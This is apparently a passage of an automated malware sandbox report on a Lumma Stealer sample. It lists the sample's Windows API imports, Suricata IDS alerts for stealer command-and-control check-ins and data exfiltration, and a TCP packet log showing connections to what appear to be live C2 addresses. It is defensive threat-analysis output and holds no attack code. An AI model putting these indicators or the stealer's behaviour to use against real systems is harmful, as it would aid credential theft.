                                                                                                                                                                                                                                                  KERNEL32.dllAcquireSRWLockExclusive, CloseHandle, CloseThreadpoolWork, CompareStringW, CreateFileW, CreateThread, CreateThreadpoolWork, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, ExitThread, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, FreeLibraryAndExitThread, FreeLibraryWhenCallbackReturns, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetConsoleWindow, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetExitCodeThread, GetFileSize, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitOnceBeginInitialize, InitOnceComplete, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, SubmitThreadpoolWork, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, TryAcquireSRWLockExclusive, UnhandledExceptionFilter, WaitForSingleObjectEx, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile
                                                                                                                                                                                                                                                  USER32.dllShowWindow

                                                                                                                                                                                                                                                  Possible Origin

                                                                                                                                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                  EnglishUnited States

                                                                                                                                                                                                                                                  Network Behavior

                                                                                                                                                                                                                                                  Suricata IDS Alerts

                                                                                                                                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                  2024-12-27T23:13:25.610456+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44973423.55.153.106443TCP
                                                                                                                                                                                                                                                  2024-12-27T23:13:26.465709+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.44973423.55.153.106443TCP
                                                                                                                                                                                                                                                  2024-12-27T23:13:28.309145+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449735104.21.66.86443TCP
                                                                                                                                                                                                                                                  2024-12-27T23:13:29.065912+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449735104.21.66.86443TCP
                                                                                                                                                                                                                                                  2024-12-27T23:13:29.065912+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449735104.21.66.86443TCP
                                                                                                                                                                                                                                                  2024-12-27T23:13:30.378308+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449736104.21.66.86443TCP
                                                                                                                                                                                                                                                  2024-12-27T23:13:31.195519+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449736104.21.66.86443TCP
                                                                                                                                                                                                                                                  2024-12-27T23:13:31.195519+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449736104.21.66.86443TCP
                                                                                                                                                                                                                                                  2024-12-27T23:13:32.784606+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449737104.21.66.86443TCP
                                                                                                                                                                                                                                                  2024-12-27T23:13:35.188581+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449738104.21.66.86443TCP
                                                                                                                                                                                                                                                  2024-12-27T23:13:37.425413+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449739104.21.66.86443TCP
                                                                                                                                                                                                                                                  2024-12-27T23:13:40.144074+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449741104.21.66.86443TCP
                                                                                                                                                                                                                                                  2024-12-27T23:13:40.950937+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449741104.21.66.86443TCP
                                                                                                                                                                                                                                                  2024-12-27T23:13:42.627339+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449743104.21.66.86443TCP
                                                                                                                                                                                                                                                  2024-12-27T23:13:46.299504+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449747104.21.66.86443TCP
                                                                                                                                                                                                                                                  2024-12-27T23:13:47.067796+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449747104.21.66.86443TCP

                                                                                                                                                                                                                                                  Network Port Distribution

                                                                                                                                                                                                                                                  TCP Packets

                                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:24.153023958 CET49734443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:24.153078079 CET4434973423.55.153.106192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:24.153157949 CET49734443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:24.162209034 CET49734443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:24.162225962 CET4434973423.55.153.106192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:25.610265970 CET4434973423.55.153.106192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:25.610455990 CET49734443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:25.614382029 CET49734443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:25.614398956 CET4434973423.55.153.106192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:25.614612103 CET4434973423.55.153.106192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:25.657922029 CET49734443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:25.663091898 CET49734443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:25.707336903 CET4434973423.55.153.106192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:26.465707064 CET4434973423.55.153.106192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:26.465727091 CET4434973423.55.153.106192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:26.465755939 CET4434973423.55.153.106192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:26.465770006 CET4434973423.55.153.106192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:26.465799093 CET4434973423.55.153.106192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:26.465826035 CET49734443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:26.465847015 CET4434973423.55.153.106192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:26.465879917 CET49734443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:26.465902090 CET49734443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:26.652956963 CET4434973423.55.153.106192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:26.652997017 CET4434973423.55.153.106192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:26.653043985 CET49734443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:26.653055906 CET4434973423.55.153.106192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:26.653099060 CET49734443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:26.686541080 CET4434973423.55.153.106192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:26.686575890 CET4434973423.55.153.106192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:26.686594963 CET4434973423.55.153.106192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:26.686626911 CET49734443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:26.686672926 CET49734443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:26.699717999 CET49734443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:26.699736118 CET4434973423.55.153.106192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:26.699745893 CET49734443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:26.699752092 CET4434973423.55.153.106192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:26.963068962 CET49735443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:26.963128090 CET44349735104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:26.963206053 CET49735443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:26.963522911 CET49735443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:26.963537931 CET44349735104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:28.309035063 CET44349735104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:28.309144974 CET49735443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:28.312086105 CET49735443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:28.312099934 CET44349735104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:28.312310934 CET44349735104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:28.313519955 CET49735443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:28.313556910 CET49735443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:28.313589096 CET44349735104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:29.065897942 CET44349735104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:29.066015959 CET44349735104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:29.066081047 CET49735443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:29.066246033 CET49735443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:29.066268921 CET44349735104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:29.066289902 CET49735443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:29.066296101 CET44349735104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:29.108685017 CET49736443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:29.108738899 CET44349736104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:29.108802080 CET49736443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:29.110729933 CET49736443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:29.110745907 CET44349736104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:30.378195047 CET44349736104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:30.378308058 CET49736443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:30.380341053 CET49736443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:30.380353928 CET44349736104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:30.380682945 CET44349736104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:30.389415979 CET49736443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:30.389461040 CET49736443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:30.389506102 CET44349736104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:31.195503950 CET44349736104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:31.195558071 CET44349736104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:31.195578098 CET44349736104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:31.195600033 CET49736443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:31.195619106 CET44349736104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:31.195657015 CET49736443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:31.203511000 CET44349736104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:31.211916924 CET44349736104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:31.211958885 CET49736443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:31.211966991 CET44349736104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:31.220247984 CET44349736104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:31.220290899 CET49736443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:31.220299006 CET44349736104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:31.267297983 CET49736443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:31.267308950 CET44349736104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:31.314173937 CET49736443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:31.315484047 CET44349736104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:31.361057043 CET49736443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:31.361069918 CET44349736104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:31.400059938 CET44349736104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:31.400125980 CET49736443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:31.400134087 CET44349736104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:31.400201082 CET44349736104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:31.400244951 CET49736443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:31.402642012 CET49736443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:31.402661085 CET44349736104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:31.402668953 CET49736443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:31.402676105 CET44349736104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:31.525814056 CET49737443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:31.525862932 CET44349737104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:31.525938988 CET49737443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:31.526225090 CET49737443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:31.526242971 CET44349737104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:32.784543037 CET44349737104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:32.784605980 CET49737443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:32.787101030 CET49737443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:32.787115097 CET44349737104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:32.787317038 CET44349737104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:32.789119005 CET49737443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:32.789319992 CET49737443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:32.789355040 CET44349737104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:32.789411068 CET49737443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:32.789417982 CET44349737104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:33.763356924 CET44349737104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:33.763458014 CET44349737104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:33.763519049 CET49737443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:33.763688087 CET49737443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:33.763700008 CET44349737104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:33.931615114 CET49738443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:33.931668043 CET44349738104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:33.931737900 CET49738443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:33.932094097 CET49738443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:33.932111025 CET44349738104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:35.188515902 CET44349738104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:35.188580990 CET49738443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:35.192049980 CET49738443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:35.192065954 CET44349738104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:35.192270994 CET44349738104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:35.193682909 CET49738443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:35.193862915 CET49738443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:35.193890095 CET44349738104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:36.014717102 CET44349738104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:36.014786959 CET44349738104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:36.014844894 CET49738443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:36.015113115 CET49738443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:36.015130997 CET44349738104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:36.195837021 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:36.195873022 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:36.195950031 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:36.196253061 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:36.196263075 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:37.425291061 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:37.425412893 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:37.426806927 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:37.426819086 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:37.427042961 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:37.428205967 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:37.428385973 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:37.428415060 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:37.428476095 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:37.428484917 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:38.376885891 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:38.376960993 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:38.377012968 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:38.377274036 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:38.377288103 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:38.837332964 CET49741443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:38.837380886 CET44349741104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:38.837457895 CET49741443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:38.838051081 CET49741443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:38.838073015 CET44349741104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:40.143580914 CET44349741104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:40.144073963 CET49741443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:40.147255898 CET49741443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:40.147265911 CET44349741104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:40.147505045 CET44349741104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:40.148724079 CET49741443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:40.148724079 CET49741443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:40.148762941 CET44349741104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:40.950920105 CET44349741104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:40.950997114 CET44349741104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:40.951047897 CET49741443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:40.951221943 CET49741443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:40.951240063 CET44349741104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:41.365425110 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:41.365470886 CET44349743104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:41.365552902 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:41.365998030 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:41.366013050 CET44349743104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:42.627253056 CET44349743104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:42.627338886 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:42.628695965 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:42.628712893 CET44349743104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:42.628926992 CET44349743104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:42.635778904 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:42.636569977 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:42.636605024 CET44349743104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:42.636809111 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:42.636848927 CET44349743104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:42.636941910 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:42.636985064 CET44349743104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:42.637785912 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:42.637809038 CET44349743104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:42.637943029 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:42.637969017 CET44349743104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:42.638221979 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:42.638247967 CET44349743104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:42.638254881 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:42.638394117 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:42.638410091 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:42.683340073 CET44349743104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:42.683475971 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:42.683516026 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:42.683526993 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:42.727334976 CET44349743104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:42.731502056 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:42.731534958 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:42.731556892 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:42.775368929 CET44349743104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:42.779364109 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:42.823343039 CET44349743104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:42.997786045 CET44349743104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:45.075472116 CET44349743104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:45.075547934 CET44349743104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:45.077255964 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:45.077485085 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:45.077502012 CET44349743104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:45.085623026 CET49747443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:45.085660934 CET44349747104.21.66.86192.168.2.4
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:45.085737944 CET49747443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:45.086039066 CET49747443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                                  Dec 27, 2024 23:13:45.086055040 CET44349747104.21.66.86192.168.2.4
